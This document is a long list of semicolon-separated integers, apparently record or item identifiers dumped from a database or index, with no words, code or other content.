107567;46320;107568;50572;55477;56430;50364;107569;132893;56675;107570;126615;107571;66187;107572;66188;107573;107574;49234;53275;132894;107575;107576;50621;47100;107577;107578;48937;107579;55478;107580;50622;107581;107582;71659;71660;71661;71662;71663;71664;107583;93710;107584;71665;107585;107586;71666;107587;71667;50521;56431;51878;51879;57632;107588;56432;110656;64249;71668;107589;51880;87367;107590;51881;107591;62110;107593;107592;56676;57834;107594;54965;107595;64654;71669;107596;71670;107597;53247;53276;107598;59441;107599;52967;71671;107600;71672;71673;71674;71675;71676;71677;71135;59979;64655;59601;107601;54992;107603;107602;59049;107604;93798;107605;56433;55479;107606;71678;56434;71679;56435;71680;107607;107608;107609;58643;107610;107612;107611;107613;107614;71681;107615;107616;107617;107618;107619;107620;107621;71682;57392;107622;56464;107623;58477;107624;107625;107626;107627;107628;107629;107630;107631;124074;69902;71683;107632;56976;107633;107634;107635;57835;59050;107636;59051;59286;107637;64656;107638;107639;107640;107641;107642;107643;107644;66739;107645;107646;107647;107648;124075;68869;64657;107649;71684;107650;57680;66352;107651;107652;121176;83539;111116;107653;64606;58735;107654;59287;107655;64607;107656;107657;107658;107659;107660;66353;107661;64608;71685;79428;58028;107662;58559;107663;83540;107664;58127;107665;68870;107666;107667;64609;107668;59963;80844;107669;65208;107670;58736;107671;64610;107672;66710;72003;107673;73054;107674;107675;62450;63217;107676;107677;65628;61482;107678;64611;107679;64612;107680;106090;107681;107682;59442;156786;71686;71687;107683;62433;107684;61593;107685;91593;69903;107686;71455;107687;71689;71688;71690;107688;107689;74083;65680;107690;121177;107691;80845;107692;65638;107693;65681;107694;77721;109071;126719;107695;107696;107697;107698;107699;107700;107701;107702;107703;107704;107705;107706;107707;66800;72165;107709;107708;107710;107711;107712;107713;107714;107715;107716;107717;107718;107719;107721;107720;107722;111117;118060;121178;132895;129872;69904;107723;90082;71691;107724;107725;70442;69905;107726;107727;77680;107728;84721;107729;70443;107730;107731;107733;107732;107734;107735;76517;107736;80076;107737;107738;73055;74084;107739;76086;107740;79306;107741;85734;80846;107742;82761;107743;82762;107744;87493;107745;90083;107746;80847;107747;107748;107749;107750;107751;107752;107753;111118;118061;124076;126720;138423;154224;87640;107755;107754;90084;107756;107757;84205;107758;107759;109072;86452;107760;109073;107761;86453;107762;107763;107764;107765;111119;90571;107766;107767;107768;107769;90572;111120;107770;107771;107772;107773;111121;118129;118130;92405;107774;126721;87520;107775;87521;107776;107777;132896;146233;107778;90703;90704;107779;107780;107781;109074;87986;107782;118062;90085;90573;107783;107784;93587;107785;107786;109075;107787;135438;126722;138424;154226;97124;107788;107789;97125;107790;107791;109076;126723;135439;138425;145191;156749;154225;97693;99756;107792;100145;107793;107794;100146;111122;118131;111123;118132;118133;118134;121179;126724;126725;141557;141558;151901;29980;22976;24323;22977;107795;41067;22979;22978;22980;107796;22981;22982;23763;23687;23688;19205;20333;22983;19206;20053;21261;107797;107798;19450;107799;107800;19580;39388;21007;19370;22154;36952;21262;22245;22984;24848;107801;107802;107803;107805;107804;130510;107806;22985;82537;24381;107807;107808;22986;20054;41001;19745;107809;22987;67152;107810;22988;107811;107812;107813;107814;107815;107816;109912;109884;20055;47893;107817;107818;107819;22302;42067;29720;46334;25457;107820;105347;22989;107821;25389;46746;107822;22990;107823;19451;107824;19581;33794;107826;107825;107827;107828;107829;107830;107831;107832;107833;129873;19207;138426;61392;107834;22991;107835;107836;107837;107838;107839;107840;107841;107842;107843;107844;107845;121180;126726;129874;135440;138427;140364;149803;156784;25542;107846;107847;31597;107848;107849;107850;148765;24382;107851;107852;107853;22992;19371;71692;107854;24383;26992;24384;25277;24342;19216;107855;107856;24385;107857;22993;107858;22994;107859;107860;111124;71693;25390;107861;25391;107862;71821;107863;19452;107864;19453;20944;30170;30171;41953;19454;19372;22995;107865;107866;107867;22446;36725;20741;107868;19746;19840;107869;107870;26993;32366;22996;107871;38126;107872;25392;20860;20274;107873;107874;22998;38855;107875;22999;20742;107876;25072;107877;20275;43887;25393;20276;35413;107878;53511;20381;24955;33208;26994;36329;36931;22062;107879;21008;107880;23000;33912;107881;107882;154219;39489;39490;41982;23001;35414;25073;21263;107884;107883;107886;107885;107888;107887;22063;107889;23689;23002;23003;107890;23004;109857;107891;25645;30172;107892;24849;107893;23739;107894;71694;107895;25646;107896;107897;73909;107898;67153;107899;107900;107901;107902;24386;22898;107903;23917;24387;25394;33913;107904;107905;132897;71822;107906;43888;23918;24388;24389;107907;107908;107909;107910;71695;23749;107911;47894;107912;47157;27077;107913;23919;35204;24390;24850;107914;24214;107915;24391;107916;24392;24851;107917;37742;107918;107919;26995;107920;107921;26996;26997;107922;107923;107924;129875;42971;30008;25543;132898;135441;148764;25647;107925;25434;107926;107927;107928;107929;107930;107931;24852;109885;46321;37070;26998;26999;27000;107932;27001;107933;41944;107934;30009;29827;25278;107935;107936;107937;107938;107939;130511;25395;107940;71696;107941;107942;126727;107943;25729;30173;69906;107944;27078;107945;107946;27002;32497;71697;107947;107948;107949;117684;31990;27003;28279;27079;107950;30010;107951;42172;41054;27004;27005;27006;27080;107952;77914;107953;107954;107955;62115;107956;97126;27081;107957;25648;107958;107959;27082;27083;32170;107960;71698;31760;31761;35205;35206;38004;37728;107961;107962;31334;45451;107963;27084;29207;36874;27085;107964;27086;32367;107965;62509;37278;29721;32171;32172;32173;32174;32498;32175;43889;32176;107966;37825;107967;29208;35415;107968;107969;31188;107970;32499;37188;107971;107972;107973;107974;107975;107976;121181;126728;30174;107977;81876;107978;30175;107979;31335;107980;31336;32500;32501;32177;32368;107981;107982;107983;31337;107984;32369;107985;62510;34799;33209;34800;107986;43146;107987;38170;38171;107989;107988;107990;107991;107992;107993;71699;107994;33210;107995;107996;107997;58760;107998;32370;33914;107999;33795;34067;33915;108000;34801;34802;34803;35207;34805;34804;34806;34807;96565;34808;35208;33796;108001;37639;51970;35570;38825;108002;35209;108003;39556;108004;39557;108005;39558;35210;40368;34809;108006;48918;35416;35211;108007;111125;34107;108008;58761;108009;58762;37456;37702;108010;35212;36795;108011;35417;108012;37287;108013;35213;35214;36512;36555;108014;38712;108015;35571;108016;41055;71701;71700;38784;38772;38773;38826;38757;38785;44388;108017;35572;108018;55064;38739;108019;38740;108020;35573;108021;35418;38786;38787;38827;36559;49788;39327;39318;108022;36337;108023;37297;39575;42141;42186;108024;59234;39416;42142;40587;42258;42100;42187;42166;108025;42188;108026;42222;42223;42224;40777;108027;39003;108028;39310;40750;39764;108029;39417;39765;42101;60091;40343;108030;40369;43344;108031;40970;108032;40938;42225;42143;46667;108033;40925;42226;46322;135442;42242;71702;108034;71823;43049;49137;71824;71703;108035;108036;67154;67155;108037;108038;108039;108040;109858;132899;138428;71704;108041;108042;48938;50042;49081;49751;49138;108043;108044;108045;108046;108047;108048;108049;124077;135443;145172;44927;108050;108051;108052;108053;44928;108054;46323;108055;71825;46324;108056;71826;44357;108057;52471;49082;49992;108058;45117;108059;71705;99433;108060;45597;108061;108062;46325;108063;55480;50538;56436;50365;132900;108064;56677;108065;108066;65978;126616;108067;65979;108069;108068;53277;49235;132901;108070;50623;108071;48939;108072;55481;108073;50624;108074;108075;108076;71707;71706;71708;71709;71711;71710;93711;108077;108078;108079;71712;108080;71713;108081;71714;50522;108082;53822;56437;51882;57633;108083;56438;110657;64250;108084;51883;87368;108085;51884;108086;108087;56678;57836;56700;108088;54966;108089;64658;53248;108090;53278;108091;59443;52968;108092;71715;71716;71717;71718;71719;71720;71721;71879;64659;108093;55017;108094;108095;59013;108096;93799;56439;108097;55482;108098;56440;56441;71722;71723;108099;108100;58737;108101;108102;108103;108104;108105;108106;108107;71724;108108;108109;108110;108111;108112;108113;71725;108114;56465;108115;58478;108116;108117;108118;108119;108120;108121;108122;108123;124078;69907;71726;108124;56977;108125;108126;57837;108127;59014;108128;59052;59235;108129;64660;108130;108131;108132;108133;108134;108136;108135;66740;92406;108137;64552;108139;108138;108140;108141;68871;124079;64661;108142;71727;108143;57681;108144;66332;108145;121182;83541;108146;111126;64524;108147;58738;108148;59236;108149;64525;108150;108151;108152;108153;66333;108154;64526;71728;79429;58029;108155;58587;108156;83542;108157;58128;108158;68872;108159;108160;64527;108161;59953;108162;80848;65186;108163;58739;108164;58763;64528;108165;66711;108166;72004;108167;73056;108168;62451;108169;63218;108170;65595;108171;61457;108172;64529;108173;64530;108174;106091;108175;59444;108176;156787;71729;71730;108177;62429;108178;61594;108179;91594;108180;69908;108181;71456;71731;71732;71733;108182;74085;108183;65665;108184;108185;121183;80849;108186;65639;108187;65672;108188;77722;109077;126729;72166;108189;108190;108191;108192;108193;108194;108195;108196;108197;108198;108199;108200;108201;108202;111127;108203;118063;121184;129876;132902;91595;68873;90086;108204;69397;108205;108206;69909;70444;108207;84722;108208;70445;108209;108210;108211;108213;108212;108214;76518;108215;108216;80077;74086;108217;79270;80850;108218;82763;108219;82764;108220;87494;108221;90087;108222;108223;108224;108225;108226;108227;108228;111128;118064;124080;126730;138429;154223;87641;108229;90088;108230;108231;108232;109078;86454;108233;108234;109079;86455;108235;108236;108237;108238;111129;90574;108239;108240;108241;108242;111130;90575;108243;108244;108245;108246;111131;118135;92407;118136;108247;126731;87522;108248;87523;108249;108250;132903;146247;90675;108251;90676;108252;108253;108254;109080;87987;108255;118065;90089;108256;90576;108257;93588;108258;108259;108260;109081;126732;135444;138430;154222;97127;108261;108262;97128;108264;108263;109082;126733;135445;145096;138431;154220;156750;97694;108265;99757;100147;108266;108267;100148;111132;118137;111133;118138;118139;121185;118140;126735;126734;141551;141553;151893;80580;80581;80582;80583;80584;80585;80586;80587;80588;80589;80590;88514;80591;78395;80592;80593;80594;80595;80596;80597;80598;80599;80600;80601;80602;80603;80604;80605;80606;80607;80608;80609;80610;80611;80612;80613;80614;80615;80617;80616;80618;80619;80620;80621;80623;80622;80624;80625;80627;80626;80628;80629;80631;80630;80633;80632;80635;80634;80636;80637;80638;80640;80639;80641;80642;80643;80644;80645;80646;80647;80648;80649;80650;80651;80652;80653;80654;80655;80656;80657;80658;80659;80660;80661;84807;80662;80663;80664;80665;80666;80667;80668;80669;80670;80671;80672;80673;80674;80675;80676;80677;80678;80679;80680;80681;80682;80684;80683;80685;80686;80687;80688;80689;80690;80691;80692;80693;80694;80695;80696;80697;80698;80699;80700;80701;80702;80703;80704;80705;80706;80707;80708;80709;80710;80711;80712;80713;80934;80714;80716;80715;80718;80717;80719;80720;80721;80722;80723;80724;80725;80726;80727;80728;80729;80730;80731;80733;80732;80734;80735;80737;80736;80739;80738;80741;80740;80743;80742;80745;80744;80747;80746;80748;80749;80750;80751;80752;80753;80754;80756;80755;80757;80758;80759;80760;80761;80762;80763;80764;80765;80766;80767;80768;80769;80770;80771;80772;80773;80774;80776;80775;80778;80777;80779;80780;80782;80781;80783;80784;80785;80786;80788;80787;80789;80790;80792;80791;80794;80793;80795;80796;80797;80798;80799;80800;80801;80802;80803;80804;80805;80806;80807;80809;80808;80810;80811;80812;80813;80814;80815;80817;80816;80818;80819;80820;80821;80822;80823;80824;36510;36870;37948;37361;36271;37928;38071;36972;37461;37878;38025;37019;37416;36808;37909;36258;37902;38046;37893;37580;36639;36565;37094;37862;38094;38024;23126;23147;23150;67156;23151;23155;23158;23159;37154;37833;23163;23164;23165;23166;36626;37540;23167;23168;23198;23223;23235;23238;67157;23239;23244;67158;23247;23248;36327;38116;23249;23254;23255;23257;24974;24975;37130;23258;23259;23260;23262;23261;23263;36915;37857;37700;23264;36272;38110;23265;37992;36616;36678;37982;23266;23267;37458;36872;23268;23269;24393;23690;24394;23285;23291;23294;23295;23297;23296;38067;36987;13295;23301;13296;13297;13298;13299;13300;13301;23304;13302;33916;13304;13303;13305;13306;13307;13309;21170;26959;23306;13310;13311;13312;13313;13314;13315;13316;13317;18068;13318;13319;13320;13321;13322;13323;26909;13324;67159;14199;13325;13326;23315;21009;13327;13328;13330;23316;13331;13332;13333;13334;13336;17356;13337;23321;13338;13339;13340;13341;13342;13343;13345;13346;13347;13348;13349;13350;23326;13351;13352;72142;13354;13353;13355;13356;22155;13357;23327;13358;13359;13360;67160;13361;13362;13363;23328;13364;13365;13366;13367;13368;13369;13370;33211;13371;13372;23330;13373;13374;67161;13375;13377;13378;13380;13381;23334;13382;23336;23335;13383;13384;13385;13386;23338;33797;67162;13387;13388;13389;36568;37081;13390;13391;23343;13392;23344;13393;13394;13395;23345;23346;23351;23352;23355;23358;23359;13396;13398;13397;16084;13399;23360;23361;13400;23362;23363;25730;13401;23364;23365;13402;23366;23367;23368;13403;23369;24984;25074;23371;23372;23373;23374;13404;37808;24985;36946;23375;23376;23377;23378;23379;13405;36543;43895;23381;23383;23384;23385;23386;23387;23388;23389;23390;23391;23392;22507;15593;15482;15594;15744;17357;18284;13406;20945;30176;23395;23396;23397;23402;23403;23404;23405;23406;23407;19455;19456;23409;23410;37241;36716;37226;37979;23411;24986;36406;36305;24853;23412;23413;23414;23415;23416;23417;33798;23418;37733;37251;37548;36577;23421;24395;37271;23423;23424;27053;36302;37867;76553;27007;20946;23427;23428;25279;73910;37363;24396;24397;24398;27509;34996;27008;24399;37397;27009;24854;27010;25281;26960;25650;38026;31762;36789;27087;67163;29828;36415;37098;36954;31598;33426;33799;35222;34068;71734;36494;40971;40939;67164;71735;71736;71737;72144;72143;76519;86456;86457;90577;90578;13407;23430;13408;13409;13410;13411;13412;23433;13413;33918;13414;13415;13416;13417;13419;21171;27011;13420;13421;13422;13423;13424;13425;18070;13426;13427;13428;13429;13430;13431;13432;27088;13433;67165;14200;13434;23439;21010;13435;27012;23440;13437;13438;13440;17358;13441;13442;13444;13443;13446;13445;13447;13448;13450;13451;13452;13453;13454;13455;13456;13457;13458;13459;13460;22156;13461;13462;13463;13464;13465;13466;13467;13468;13469;13470;13471;13472;13473;13474;33212;13476;13475;13477;13478;13480;13481;13483;13484;23447;13485;13486;13487;13488;13489;13490;13491;13492;13493;23449;13494;13495;13496;13497;13498;13499;16088;13500;13501;13502;13503;13504;23452;23453;25731;13505;23454;23455;13506;25076;13507;13508;43896;23457;23459;23460;22508;15595;15483;15596;15745;17359;18283;13509;20947;23461;23462;23463;19457;19582;23465;23466;37670;37821;23772;27014;38008;76554;20948;23470;24400;24401;27015;24402;24856;27016;25652;27017;27089;29850;31599;33427;35215;34069;37644;40972;40940;71738;71739;72145;76520;86458;86459;90579;90580;23472;23473;23474;67166;13510;13511;13513;23477;23478;14367;13514;13515;13516;13517;19458;26165;13518;13519;13520;33919;53353;13521;13523;13524;13525;16089;29209;13527;53281;13529;34230;13740;22157;23480;13530;23485;23486;13531;13534;14201;13536;72146;23488;46797;23491;23492;13541;13543;13544;16187;23493;23494;72147;23495;46798;13545;13546;13547;13549;13550;13551;18074;13548;15756;13554;16090;13555;13556;13553;13558;31600;13559;23496;23497;13560;25732;13561;23498;23499;23500;23501;27090;13562;13563;23503;13564;23504;23505;13565;24993;56688;13566;23507;23508;21264;45408;23509;23510;13567;23511;40973;13568;52731;21011;13569;13571;24994;36978;23512;23513;23514;23515;23516;13572;13741;13573;23517;49655;13574;13575;49789;13745;37260;23519;28280;23521;23522;23523;23524;15757;13576;23525;23526;23527;23528;23529;55018;13577;26166;23530;26167;45032;23531;17360;15609;26910;18179;18285;30177;23534;23535;23536;23541;23542;34997;34998;23543;23544;23545;76555;23546;21265;23547;19841;19459;19460;23549;23550;37513;37046;36670;23551;38081;24995;36719;37426;23552;19842;17683;48941;18609;23553;23554;23555;33800;23556;25398;21172;36504;37387;36889;36257;24403;23559;37533;56087;23562;23563;47895;24996;33213;27018;36330;36676;23564;27019;24858;52732;25078;23567;23568;24220;24404;27091;26168;25283;73911;36354;24405;24406;27092;24407;34999;27021;27020;36484;45118;24859;27022;27023;25285;27093;71740;27024;27025;37630;71741;31763;67167;36547;35419;36684;37558;37722;30178;33801;33428;32371;33802;35000;35420;38075;71742;35574;39004;40974;40941;71743;71827;71828;67168;71744;71829;80884;46326;55540;71746;71745;71747;73593;77911;78112;72148;76521;86460;86461;90581;90582;23569;13579;23570;14366;72149;13581;71830;16188;23572;13583;13584;23573;13585;46799;13586;13587;13588;13589;13590;13592;13591;13593;16091;29211;46800;13594;18076;33921;27094;13596;53527;18078;13600;22248;13601;13603;13604;16092;13605;13606;13607;27095;13608;31601;13609;23574;23575;13610;13611;25733;13612;23576;13615;13616;13617;23578;14202;13620;56679;27026;23580;23581;21267;45409;13621;23582;40975;13622;13623;52733;13624;13625;13626;27027;13627;13629;23583;23584;23586;23585;23587;13630;13743;13631;34231;49790;37470;23589;23591;23592;23593;23594;15759;13633;23595;23596;25196;13634;27029;45033;14672;23597;27096;17361;15999;27097;54967;18180;18286;46764;23598;23599;23603;35001;35002;23604;23605;23606;49656;21268;23607;19843;19461;19583;23609;23610;19844;17686;22249;18610;23611;23612;36841;23613;33803;19462;25401;21173;76556;36986;23773;38005;23619;23620;56088;47896;24997;33214;34232;27030;36451;21012;23621;24861;28281;27031;52734;25079;23623;24222;24408;27032;27098;73912;67169;24409;27099;24410;24862;27033;27034;45119;24863;27039;27100;27042;71748;31764;67170;30179;35421;33804;33429;32372;33805;33806;35422;35003;35423;37711;71749;35576;39005;40976;71750;40942;71831;71751;71832;46327;55541;71752;71753;73594;77912;78113;76522;72150;86462;86463;90583;90584;44397;76800;76801;76802;76803;76804;76805;76807;76806;82817;76808;82818;90619;90620;90621;90622;99457;99458;99459;109172;109173;109174;109175;109176;124153;124154;135667;135668;135669;148933;29217;47040;78461;76809;76810;76811;76812;76813;76814;76815;80935;80936;80937;80938;80939;80940;80941;80942;88001;88002;88003;96601;96602;106125;121221;106126;121222;121223;132996;132997;156903;132998;156901;156902;76816;156900;76818;76817;76819;76820;76821;84759;84760;92452;92453;92455;92454;101802;101801;101803;101804;101805;101806;111186;111187;111188;111189;111190;111191;126764;126765;126766;126767;126768;126769;138539;151922;151923;76822;76823;76824;76826;76825;76827;76828;11513;100997;76829;76830;76831;76832;76833;76834;76835;76836;78463;78462;86530;86531;86532;86533;86534;94132;94133;94134;94135;118188;118189;118190;130006;130007;130008;130009;141772;141773;141771;154265;154264;124062;126263;130458;86996;86994;86995;140041;154473;142712;78915;86425;102862;103874;78916;78917;146309;146310;148180;154339;78913;144366;144449;146992;83817;62118;144334;73963;62117;62893;159004;155441;155442;155443;156208;144198;146808;144622;146928;91459;91458;91123;91917;92559;77504;86421;87600;59115;59116;47136;47137;47138;154954;77503;92040;92041;53812;42877;58105;58106;31681;31680;53811;53332;57824;66351;24912;82028;71844;71845;71846;103504;123417;104353;131167;132583;66973;66972;71843;49288;127058;154953;92467;20865;127107;141474;150981;92468;148994;149047;96305;92967;95656;109575;27618;146091;153807;155961;157871;17972;150720;150715;146088;56649;56648;38929;29999;62948;25933;26002;39448;92968;72337;46860;133963;133962;34060;100845;100846;99237;100872;70142;65873;65874;94900;66024;131725;136175;96281;11834;69441;45019;21673;11901;21229;19516;21082;34109;16137;34110;18048;40552;18671;12088;10393;20978;121572;47620;66037;79721;66835;69284;70213;71115;73246;71784;73575;76528;79722;79723;77238;79724;83992;81812;85581;85962;100844;90705;92790;93110;97526;99707;94932;97100;99235;126702;102731;104850;12215;158383;121164;47621;49070;121163;104498;121043;74243;84344;49071;47619;49072;49069;49286;53633;129500;119846;133148;21764;123005;58343;11706;21726;31717;43404;140535;24781;122584;24726;30131;42931;42932;42933;119721;119722;119723;119724;119725;119726;119727;24873;29216;40420;44384;45591;82530;57287;48433;49693;56215;69041;69042;63318;64501;65601;73131;77985;79742;108809;83529;84674;86191;100617;89052;89080;91193;91194;139912;139923;148111;44400;24870;10768;35620;15929;12294;20010;16163;12124;10923;15463;19237;57750;49692;16190;62031;62029;62030;21571;17652;38793;14228;16228;18504;20970;12647;14217;15718;35661;38794;21630;21038;22230;17257;11415;11753;18372;11066;10882;10708;10965;11341;108798;70658;104411;152684;100158;102094;102095;10607;32320;32314;106462;10267;11821;11343;12634;97993;121007;10268;10472;57620;153954;11340;56300;86328;11195;51092;10269;149334;56299;10881;122501;11339;90707;11169;14273;153588;31421;73920;71533;70657;63156;20927;90317;71049;153953;64913;58751;94437;31705;64688;56284;80102;70544;45410;52963;15901;42981;42980;121009;45411;57571;10863;35297;91263;62565;61447;32321;20007;131290;132675;83738;56043;124410;89058;62969;83298;121008;51356;83875;42873;42053;66848;57041;78479;65821;156899;42880;51891;58768;105415;94761;81606;57582;86067;51192;71534;21643;62563;62564;56984;63398;56471;56472;131127;132676;35291;95631;60108;103864;69551;26928;42476;11875;132634;14361;11677;10270;17285;35703;35705;31355;29701;10544;132025;11817;11569;11568;11762;35704;35706;10639;10817;10271;126589;10803;11230;117387;117390;34946;117365;128766;117363;117388;117392;117401;117364;66935;117389;66931;128765;117362;68981;70168;117402;117391;117393;73203;81105;117457;73763;73944;117404;143125;117403;83487;79860;88714;119728;90773;90152;90153;91811;91812;94336;118731;118732;117400;102918;101361;97610;97576;101548;102960;129387;102977;105005;108760;112036;112064;139607;143599;95887;151425;73919;122235;60093;144365;99671;73943;34947;60094;69240;60095;38208;60096;117461;47900;57691;57850;42822;60022;60021;45580;32394;56090;65690;73212;73500;74421;77182;78584;82077;83730;92557;65689;49270;50658;10409;12260;12261;12284;13848;14800;125387;127137;66474;68930;40620;71566;78068;71567;71568;71569;72744;78506;12259;40619;87735;78507;21570;42962;19496;20286;15950;62390;62389;33439;33440;33438;38913;43615;32121;35688;25705;39314;21597;38198;35105;35104;38695;29926;77557;68958;33437;25000;33486;64817;23931;64818;24022;64819;25124;64820;25370;64821;25627;25709;64822;25903;64823;26923;64824;30149;64825;31344;64826;31356;64827;35030;64828;36034;64829;40495;64830;42373;64831;33487;64832;33488;64833;33545;64815;30148;21162;124651;31423;25082;39590;17725;59736;76593;82995;84963;90628;106349;51138;32136;25693;64834;11658;69420;39618;11374;11373;10272;20888;18114;19697;55992;16322;118226;50047;50048;11536;11678;117942;76213;18000;18354;33277;25929;49709;41068;118225;41069;41071;41070;41072;41073;41074;58224;41075;41077;41076;58225;41078;41079;41080;41081;41083;41082;41084;41085;41086;41088;41087;41089;41090;41091;41093;41092;41094;41095;41096;41097;41098;41100;41099;41101;41102;41103;41105;41104;41106;41107;41108;41109;41110;41112;41111;41114;41113;41116;41115;41118;41119;41117;41120;41121;41122;41123;41124;41125;41126;41127;41128;41129;41130;41131;41132;41133;41134;41135;41136;41137;41138;41139;41140;41141;41142;41143;41144;41145;41146;41147;41148;41149;41150;41151;41152;41153;41155;41154;41156;41157;41159;41158;41160;41161;41162;41163;41164;41165;41166;41167;41168;41169;58226;41170;41171;41172;44653;41173;41174;41175;41176;41177;41178;41179;41180;41181;41182;41183;41184;41185;41186;41187;41188;41189;41190;41191;41192;41193;41194;41195;41196;41197;41198;41199;41200;41201;41202;41203;41204;41205;41206;41207;41208;41209;41210;41211;41212;41213;41214;41215;41216;41217;41218;41219;41220;41221;41222;41223;41224;41225;41227;41226;41228;41229;41230;41231;41232;41233;41234;41235;41236;41237;41238;41239;41240;41241;41242;41244;41243;41245;41246;41247;41248;41249;41250;41251;41252;41253;41254;58227;41255;41256;41257;41258;41259;41260;41261;41262;41264;41263;41266;41265;41267;41269;41268;41270;41271;41272;41273;41274;41275;41276;41277;41278;41280;41281;41279;41282;41283;41284;41285;41286;41287;41288;41290;41289;41291;41292;41293;41294;41295;41296;41297;41298;41299;41300;41301;41302;41303;41304;41306;41305;41307;41308;41309;41310;41311;41312;41313;41314;41316;41315;41317;41318;41320;41319;41322;41321;41324;41323;41621;41325;41326;41327;41964;41641;42227;41954;42299;42048;42243;42200;42947;42863;42920;42812;42836;42948;44929;43147;43364;43598;43379;43599;43854;44031;44050;44304;44591;44654;45452;44998;44958;47107;45070;45453;46205;45125;46247;46335;46216;58228;45401;47688;46169;46217;46668;47018;46685;47795;47590;46863;47568;48752;47617;49255;49101;48429;48900;48901;49757;49758;49759;49191;49760;49657;49823;51338;50854;50523;50855;50982;51111;51660;51953;58229;52629;52702;53250;52710;52711;53823;53251;53312;53636;53354;53401;53355;53637;53585;53618;53883;53868;54993;55617;55440;56033;55768;55895;55918;55826;56002;55971;41328;41329;41330;41331;41332;41333;41334;41335;41337;41336;41338;41339;41340;41341;41342;41343;41345;41344;41347;41346;41348;41349;39877;39876;39879;39878;39880;39881;39883;39882;39885;39884;39887;39886;39889;39888;39890;39891;40403;40641;41033;42388;43395;44358;44899;39892;47689;39893;39894;39896;39895;41009;39897;45375;44359;39898;40841;40881;45071;39899;47755;39900;39901;39902;39903;40642;44360;39904;39906;39905;39907;39908;44124;42244;45598;44975;47690;39909;39910;39911;46006;42245;42389;39912;39913;39915;39914;39916;42173;44678;39917;39918;44361;39919;39921;39920;42949;40442;44305;39922;39923;39924;39925;40882;47569;46185;43025;39926;39927;39928;42228;45339;39929;47570;39930;39931;39932;39933;39934;39935;39936;45619;47796;39937;39938;42837;45349;39939;39940;45095;39941;39942;39944;39943;42471;43600;45096;39945;40643;41034;42314;39946;39947;39948;39949;39950;40842;39951;39952;42102;39953;39954;39955;39956;39957;46248;39958;42390;43148;44032;40572;45531;43050;39959;40336;40815;44976;39960;45522;39961;39962;40488;43855;44636;46879;39963;39964;44606;39965;46206;39966;39967;39968;45532;47815;39969;39970;39971;46007;44900;45383;39972;39973;39974;40903;39975;39976;39977;39978;39979;39980;44306;39981;39982;39983;39984;39985;44607;43380;39986;40644;39987;39988;39989;39990;39991;39992;39993;46186;39994;39995;39996;39997;39998;39999;40524;42457;40000;40816;41622;42921;46187;40001;40002;40003;40525;42851;45454;45604;40004;45533;40005;42813;43051;40006;40007;40008;40009;40010;40011;40012;40783;45010;44621;40013;40014;40016;40015;40017;44086;45491;46727;40018;47602;42864;40019;40020;47120;40021;40022;40023;42229;44679;46249;45492;40645;40024;41035;43629;40025;46228;40026;40784;46218;40027;46229;40028;42315;44999;42201;40029;40030;40032;40031;40034;40033;40035;42852;40036;40037;40038;40039;40040;46353;43616;40041;40042;45097;46339;42791;40043;40044;40337;40045;40046;44362;40047;45455;40048;40049;40646;47019;40499;40050;40051;47591;40052;40053;40054;40055;41002;40056;40057;40058;40573;40059;40060;40061;42972;44409;40062;40063;46008;40064;40545;46749;40065;40066;40067;40068;40070;40069;46230;44608;42416;47706;40071;40072;40074;40073;40076;40075;44087;45523;41036;42973;40077;46669;40443;40078;40079;40080;40081;40082;40083;43869;41010;40084;47819;44125;40085;40086;40087;41037;40088;40089;40090;40092;40091;40093;40094;40095;40859;42458;42922;47725;40096;40097;47726;40098;40099;40100;44609;40101;40102;40103;44610;40104;40105;40106;43082;40107;40108;42230;44044;40109;44990;40110;40111;47820;40112;40113;41938;44051;47727;40114;40116;40115;40117;43345;40118;42859;40119;44930;40120;40121;40123;40122;44977;40124;40125;40126;40127;40128;40129;40130;40132;40131;40133;42202;41003;46686;40134;45126;40135;40136;40137;40138;41038;40139;42459;40588;40140;45011;40141;46207;40142;46340;40143;40144;44112;45456;45457;40145;40146;40147;42246;45350;45458;45481;40148;40149;44363;47773;40647;40150;40151;40152;40154;40153;42068;40843;42950;45072;40785;40844;40155;40786;40157;40156;40159;40158;40787;42417;40160;40161;40162;40163;40164;40165;40166;40167;40168;40169;40170;40171;40172;40173;40174;40404;40648;41039;42391;43396;44364;44901;47691;47906;49279;50460;45524;53682;40176;40175;41011;45376;49944;50366;50461;40177;53683;40178;44365;40845;40179;47756;45073;40883;50012;40181;40180;40649;44366;40183;40182;42247;40184;44126;45599;44978;47692;49083;53651;49824;40185;42248;46009;42392;40186;40187;42174;44680;46354;53652;49752;40188;40189;42175;49212;40190;40191;40192;44367;40193;40444;42951;44307;40194;40195;47852;40196;40884;47571;49753;40197;40198;42231;45340;47572;49667;40199;40200;40201;45620;47797;50415;53653;40202;40203;40204;42838;45351;40205;40206;45098;40207;42472;43601;45099;53654;40208;40650;40788;41040;42316;40209;40210;40211;40212;40846;42103;40213;53655;53656;40214;47816;53657;42393;43149;44033;50316;40574;45534;43052;40338;40817;44979;45525;40215;40216;40489;43381;44637;48320;46880;49641;53658;40217;48753;49993;44611;46208;40218;53659;40219;40220;48233;45535;40221;40222;50367;46010;44902;40223;44612;45384;40224;40904;53660;53661;48259;40225;40226;40227;40228;40229;40230;49754;44308;40231;40651;43382;40232;40233;40234;46188;49213;40235;40237;40236;42460;40526;40238;40239;40240;40818;42923;41623;48902;46189;53662;53663;40241;40242;40527;42853;45459;45605;50298;40243;40245;40244;45536;53664;40246;53665;42814;43053;53666;53667;53668;40247;40249;40248;40360;40250;42334;40789;42952;44034;44964;47774;48280;49668;53669;53670;40251;53671;40252;40819;40253;44088;46728;45493;53672;47603;48234;40254;42865;40255;47121;49975;40256;42232;46250;44681;45494;40652;49669;50368;48754;41041;43630;40257;46231;40790;46219;46232;50010;42317;45000;42203;53673;40258;40259;40260;40262;40261;42854;45460;53674;53675;53676;40263;40264;40265;40266;46355;49192;43617;53677;40267;46341;45100;42792;53678;40268;40339;42144;40269;44368;53679;45461;40270;40653;47020;40500;40272;40271;49264;47592;40273;40274;40275;41004;40575;53680;42974;44410;49256;40546;46750;50011;40276;40277;44613;46233;47707;53681;42418;40278;40279;40280;45526;49945;53684;50462;44089;42975;41042;40281;40445;46670;40282;40283;40284;40285;43870;41012;40286;53685;40287;44127;41043;40288;40289;40290;40860;42461;42924;47728;48430;50013;53686;40291;40292;47729;40293;40294;44614;49257;44615;40295;40296;48372;43083;40905;50369;40297;44991;40298;49265;40299;41939;44052;47730;50370;40300;46781;40301;43346;40302;42860;40303;53687;44931;40304;40305;40306;44980;42204;42205;40307;40308;40309;42206;46687;49280;50371;50463;53688;41005;40310;45127;50014;48235;40311;40312;40313;41044;40314;42462;40589;40315;45012;46209;46342;49214;40316;45462;49258;44113;45463;40317;44682;42249;45352;45482;45464;40318;44369;47775;40654;